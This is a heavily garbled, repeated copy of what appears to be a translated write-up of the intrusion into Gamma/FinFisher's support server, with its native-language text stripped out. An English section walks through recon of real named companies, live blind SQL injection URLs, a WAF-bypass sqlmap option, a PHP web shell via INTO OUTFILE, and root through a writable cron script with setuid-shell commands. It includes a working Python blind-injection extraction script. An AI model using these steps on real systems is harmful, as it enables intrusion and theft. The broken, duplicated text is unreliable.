40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
New IP ranges found this way go back into the loop: reverse lookups over each range reveal more hostnames, and fierce.pl -dns is run again against every new domain that turns up. The two tools feed each other until no new addresses or names appear.
Google helps too. Searching for academi.com turns up further hosts and related domains, for example:
54.236.143.203 careers.academi.com
67.132.195.12 academiproshop.com
67.238.84.236 te.academi.com
67.238.84.238 property.academi.com
67.238.84.241 teams.academi.com
A whois on a newly found domain such as academiproshop.com confirms whether it belongs to the same organisation, and its address may in turn lead to yet another range.
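The sorting described above, hosts inside the organisation's own netblock versus hosts parked at a hosting provider, is easy to automate. The script below is an added example, not part of the original write-up or of fierce: it parses fierce-style "IP hostname" lines and the NetRange/CIDR/CustName fields of a whois record (both embedded as constructed samples built from the values quoted above) and splits the hosts into the two groups. Function and variable names are the example's own.

```python
import ipaddress

# Constructed sample input: fierce-style "IP hostname" pairs, using the
# hostnames and addresses quoted on the page.
FIERCE_OUTPUT = """\
67.238.84.228 email.academi.com
67.238.84.242 extranet.academi.com
67.238.84.240 mail.academi.com
67.238.84.230 secure.academi.com
67.238.84.227 vault.academi.com
54.243.51.249 www.academi.com
54.236.143.203 careers.academi.com
67.132.195.12 academiproshop.com
"""

# Constructed sample input: the relevant fields of the whois answer quoted above.
WHOIS_OUTPUT = """\
NetRange:       67.238.84.224 - 67.238.84.255
CIDR:           67.238.84.224/27
CustName:       Blackwater USA
Address:        850 Puddin Ridge Rd
"""


def parse_fierce(text):
    """Return (ip, hostname) tuples from fierce-style output; other lines are skipped."""
    hosts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 2:
            hosts.append((ipaddress.ip_address(parts[0]), parts[1]))
    return hosts


def parse_whois(text):
    """Extract the netblocks and the customer/org name from a whois record.

    Blocks come from CIDR lines; a NetRange line is converted to blocks too,
    so a record that only carries NetRange still yields networks."""
    blocks = set()
    owner = None
    for line in text.splitlines():
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "CIDR":
            for cidr in value.split(","):
                blocks.add(ipaddress.ip_network(cidr.strip()))
        elif key == "NetRange":
            start, end = (ipaddress.ip_address(x.strip()) for x in value.split("-"))
            blocks.update(ipaddress.summarize_address_range(start, end))
        elif key in ("CustName", "OrgName", "Organization"):
            owner = value
    return sorted(blocks), owner


def classify_hosts(fierce_text, whois_text):
    """Split discovered hosts into those inside the organisation's own
    netblocks (self-hosted, worth scanning as a unit) and the rest
    (hosting providers such as AWS, where the neighbours are not the target)."""
    blocks, owner = parse_whois(whois_text)
    own, foreign = [], []
    for ip, host in parse_fierce(fierce_text):
        if any(ip in block for block in blocks):
            own.append((str(ip), host))
        else:
            foreign.append((str(ip), host))
    return {"owner": owner, "blocks": [str(b) for b in blocks],
            "own": own, "foreign": foreign}


if __name__ == "__main__":
    result = classify_hosts(FIERCE_OUTPUT, WHOIS_OUTPUT)
    print("Owner:", result["owner"], "blocks:", ", ".join(result["blocks"]))
    for ip, host in result["own"]:
        print("  own     %-16s %s" % (ip, host))
    for ip, host in result["foreign"]:
        print("  foreign %-16s %s" % (ip, host))
```

The foreign group is not ignored, it is handled differently: a host at AWS is scanned on its own, while the whole /27 is scanned as a block, and the foreign addresses are the ones to run through whois next in case they expose another organisation-owned range.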
Applied to Gamma, the same procedure led to finsupport.finfisher.com. The whois for finfisher.com names "FinFisher GmbH", and the search "FinFisher GmbH" inurl:domaintools lists other domains registered to that entity, among them gamma-international.de. The server the rest of the story is about is finsupport.finfisher.com.
With the list of domains and address ranges in hand, the next step is to find out what is running on them.
Every IP range is scanned with nmap. SNMP deserves a separate check, since devices that answer to a default community string give away a lot about the network.
The questions to ask about each host found:
- What kind of server is it, and what is the URL or IP actually for? The names fierce returns are a hint by themselves.
- Is a git repository exposed, for example at git.companyname.come/gitweb/?
- What else is listening: an FTP server, a VPN endpoint, mail, something unusual (VoIP systems, IP phones, ...)? Is any of it interesting?
- Web servers get most of the attention. Beyond what nmap shows, look at the subdomains fierce found, such as test.company.com and dev.company.com, which tend to be less hardened than the main site; run nikto; and try the usual leftovers: webserver/.svn/, webserver/backup/, webserver/phpinfo.php.
- Identify the software. WhatWeb fingerprints the stack; for a known CMS there are wpscan, CMS-Explorer and Joomscan. If the software is off the shelf, look up its known vulnerabilities. If it is a custom application, that is where the real work starts: map it with a proxy such as ZAP, try every parameter, read the JavaScript, and Google distinctive paths or strings from it, which often finds the same code base running elsewhere (and a copy to study).
For finsupport.finfisher.com this went as follows:
nikto found nothing useful. WhatWeb did not recognise the application either: a custom PHP site, with SQL injection as the obvious thing to try. Who writes custom applications for Gamma, and where else might the same code be running? The URLs were distinctive (an index.php with unusual parameters, and the JavaScript served from Scripts/scripts.js.php), so:
Google: allinurl:"Scripts/scripts.js.php"
That query found other sites built on the same software, one of which carried a note about the developer and Gamma Group ("... Gamma Group..."). Those sister sites were the easier place to study the application first.
They were all vulnerable to SQL injection. At least one of them sat behind a web application firewall, Apache ModSecurity, which blocked the obvious payloads; sqlmap --tamper='tamper/modsecurityversioned.py' got past it.
Once the application's PHP source (JavaScript included) had been pulled from one of the sister sites, the rest was reading rather than guessing. The code showed an LFI, checks implemented in JavaScript, and pages that issued a Location redirect for unauthenticated users but went on rendering their content, so a client that simply ignores the redirect sees everything.
On finsupport itself the /BackOffice/ admin area answered 403 Forbidden, but the SQL injection in print.php was there, a blind one: nothing from the query is displayed, only whether the page renders. The two requests
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
return different pages, which is all a blind injection needs: print.php answers yes/no questions about the database one bit at a time.
The database account was generous. It was a MySQL user with the FILE privilege, and magic_quotes, which escapes quote characters in the input, only meant that string literals had to be written without quotes (MySQL accepts hex-encoded strings and CHAR()). MySQL's INTO OUTFILE could therefore write a file into the webroot, and sqlmap --file-read confirmed that arbitrary files on the server could be read.
A PHP file dropped into the webroot is reached by its URL; the web server executes the PHP and returns HTML, so a one-line script that runs whatever is passed in a parameter is a working web shell, executing as the web server's user. That was the foothold.
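The print.php injection above is boolean-based blind: nothing from the query is displayed, only whether the page renders. The Python below is an added example, not code from the original write-up or from Gamma's application. It reproduces the bug against a constructed SQLite database (a documents table queried by a print_page function that pastes the id into the SQL, plus a users table to steal from) and shows what an attacker does with that one bit: recover a password one character at a time by binary search on each character's code point. The string literal in the stolen query is spelled with char(...) rather than quotes, the same trick that sidesteps magic_quotes on a MySQL target. print_page_fixed shows the lookup done with a bound parameter. Table contents, the qateam password and all function names are constructed for the example.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the finsupport MySQL backend: a 'documents'
    table that print.php reads, and a 'users' table the injection will steal
    from. All contents are sample data for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE documents (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO documents VALUES (1, 'Release notes'), (2, 'Licence terms')")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'qateam', 's3cret!')")
    return conn


def print_page_vulnerable(conn, doc_id):
    """The bug in print.php: the id parameter is pasted into the SQL text.
    Returns the document title, or None when the query matches nothing;
    that page/no-page difference is the only output the attacker gets."""
    sql = "SELECT title FROM documents WHERE id = %s" % doc_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def print_page_fixed(conn, doc_id):
    """Same lookup, done properly: the value travels as a bound parameter,
    and a non-numeric id is rejected before it gets anywhere near SQL."""
    row = conn.execute("SELECT title FROM documents WHERE id = ?",
                       (int(doc_id),)).fetchone()
    return row[0] if row else None


def oracle(conn, condition):
    """Ask the blind injection one yes/no question: does the page still
    render when `condition` is ANDed onto the WHERE clause?"""
    return print_page_vulnerable(conn, "1 and (%s)" % condition) is not None


def extract_string(conn, subquery, max_len=64):
    """Boolean-based blind extraction of the single value `subquery` returns.
    For each position, binary-search the character's code point with the
    question 'unicode(substr(value, pos, 1)) > mid' (unicode() is SQLite's
    ord(); MySQL's ORD() plays the same role). Past the end of the string
    substr() yields '' and the comparison is never true, so the search
    bottoms out at 0 and the loop stops."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 255
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, "unicode(substr((%s), %d, 1)) > %d" % (subquery, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


# The string literal is spelled with char(...) instead of quotes: magic_quotes
# escapes quote characters, but has nothing to say about this.
QATEAM_PASSWORD_QUERY = "SELECT pw FROM users WHERE name = char(113,97,116,101,97,109)"

if __name__ == "__main__":
    db = build_db()
    print("id=1 and 1=1 ->", print_page_vulnerable(db, "1 and 1=1"))
    print("id=1 and 2=1 ->", print_page_vulnerable(db, "1 and 2=1"))
    print("qateam password:", extract_string(db, QATEAM_PASSWORD_QUERY))
```

Eight requests per character is what the binary search costs; sqlmap does the same with more sophistication, which is why a blind injection that only ever answers "page" or "no page" still empties a database.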
 ___________
< got r00t? >
 -----------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
Getting root on roughly half of the Linux servers one lands on takes no more than two tools: Linux_Exploit_Suggester, which matches the kernel version against known local exploits, and unix-privesc-check, which looks for misconfigurations.
finsupport was running an up-to-date Debian, so kernel exploits were of no use, but unix-privesc-check reported:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
Two lines appended to /etc/cron.hourly/webalizer are enough:
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell
Then wait for cron... and nothing happened. Despite its location the script does not do its work every hour: the webalizer script checks the time and only runs at six in the morning, so the commands were executed the next morning, server time. Check ls -l /etc/localtime to learn which timezone the server lives in; it saves a lot of waiting. At 6 the webalizer job ran, and the setuid shell was ready.
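The finding unix-privesc-check made above, a root cron script that an unprivileged user can modify, is worth auditing continuously rather than once. The script below is an added example, not unix-privesc-check's code: it walks the periodic cron directories and reports the scripts (and directories) that a given uid/gid set could write, judging from ownership and mode bits rather than os.access so it gives the right answer when run as root on behalf of another user. build_demo_tree builds a constructed fixture under a temporary directory reproducing the two findings quoted above (uid 33 standing in for Debian's www-data); the hypothetical logrotate script is the correctly permissioned control.

```python
import os
import stat
import tempfile

# Directories whose scripts cron runs as root (via run-parts on Debian).
CRON_DIRS = ("/etc/cron.hourly", "/etc/cron.daily",
             "/etc/cron.weekly", "/etc/cron.monthly")


def writable_by(st, uid, gids):
    """True if a principal with user id `uid` and group ids `gids` could write
    the object described by the stat result `st`. Decided from ownership and
    mode bits only: os.access() answers for the *current* process, which is
    the wrong question when auditing as root on behalf of www-data."""
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def writable_cron_scripts(uid, gids, root="/"):
    """Return the cron scripts (and cron directories) under `root` that the
    given user could modify. Each hit is a path to root, because cron runs
    these scripts as root. Paths are reported as they would appear on the
    live host, so a fixture tree yields the same names as a real one."""
    hits = []
    for cron_dir in CRON_DIRS:
        path = os.path.join(root, cron_dir.lstrip("/"))
        if not os.path.isdir(path):
            continue
        # A writable directory is as bad as a writable script: the user can
        # drop in a new script or replace an existing one.
        if writable_by(os.lstat(path), uid, gids):
            hits.append(cron_dir)
        for name in sorted(os.listdir(path)):
            st = os.lstat(os.path.join(path, name))
            if stat.S_ISREG(st.st_mode) and writable_by(st, uid, gids):
                hits.append(cron_dir + "/" + name)
    return hits


def build_demo_tree():
    """Constructed fixture reproducing the finding quoted above: two scripts in
    cron.hourly that www-data (uid 33 on Debian) can write, beside a correctly
    permissioned control script. Returns the fixture root."""
    root = tempfile.mkdtemp()
    hourly = os.path.join(root, "etc/cron.hourly")
    os.makedirs(hourly)
    os.chmod(hourly, 0o755)
    for name, mode in (("mgmtlicensestatus", 0o777),
                       ("webalizer", 0o777),
                       ("logrotate", 0o755)):   # hypothetical, for contrast
        script = os.path.join(hourly, name)
        with open(script, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(script, mode)
    return root


if __name__ == "__main__":
    fixture = build_demo_tree()
    for hit in writable_cron_scripts(uid=33, gids={33}, root=fixture):
        print("WARNING: %s is run by cron as root. The user www-data can write to %s"
              % (hit, hit))
```

Run against a live host as root with uid=33, gids={33} (plus any supplementary groups www-data belongs to) it reproduces the two warnings above; the same walk over /etc/cron.d and the root crontab's command paths is the obvious extension.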
With root, the first thing is to collect everything that opens other doors: password hashes, ssh keys, shell histories, configuration files and the application's own table of users and passwords. Root on one machine is rarely the end; it is the key to the next one.
Then comes the network around the host. Scan it with nmap, using the nse scripts nfs-* and smb-* to find shares that are open to anyone on the segment. finsupport turned out not to have an internal network behind it, so there was nothing to pivot to; what mattered was what the server itself held, the qateam account among it.
Which brings us to what was actually taken. The haul included:
- Gamma's FinSpy;
- the FinSpy C&C software, and the C&C relay that stands between infected machines and the controller so that the customer's real C&C stays hidden;
- the FinFisher C&C documentation;
- DDoS-related material;
- Gamma Group's internal documents.
Gamma never got to announce any of it: a spoof Twitter account posing as Gamma Group posted FinSpy documents, brochures and price lists in the company's name.
Note for anyone with a GPU to spare: FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet link, 38.7 GB) is waiting to be cracked!
Finally, how does one protect oneself from this kind of software? The write-up makes two points, both of them mundane.
1) Infection comes through exploits for Java, Flash and Microsoft Office, delivered by email or by a web page the victim is lured to. Keeping the system patched, and removing Java and Flash altogether where they are not needed, closes most of that door.
Gamma sells this capability as FinSploit, with 0-days bought from VUPEN, but 0-days are rarely necessary: browsers and plug-ins stay unpatched for so long that Metasploit's browser autopwn, with its stock of public browser and Flash exploits, does the same job against most targets.
2) The user. In 95% of cases the victim installs the malware personally, having been handed it as something harmless ("..."). No exploit is needed when people run what they are sent.
The 40 GB taken were published as a torrent, and the announcement was PGP-signed so that later messages from the same author can be verified. A copy of the FinFisher material also went up on GitHub: https://github.com/FinFisher.
Discussion: Hacker News, Reddit.
Further reading recommended in the write-up:
https://www.pentesterlab.com/exercises/
http://overthewire.org/wargames/
http://www.hackthissite.org/
http://smashthestack.org/
http://www.win.tue.nl/~aeb/linux/hh/hh.html
http://www.phrack.com/
http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
https://www.corelan.be/ (Exploit writing tutorial part 1)
http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
http://www.dest-unreach.org/socat/
Books:
The Web Application Hacker's Handbook
Hacking: The Art of Exploitation
The Database Hacker's Handbook
The Art of Software Security Assessment
A Bug Hunter's Diary
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
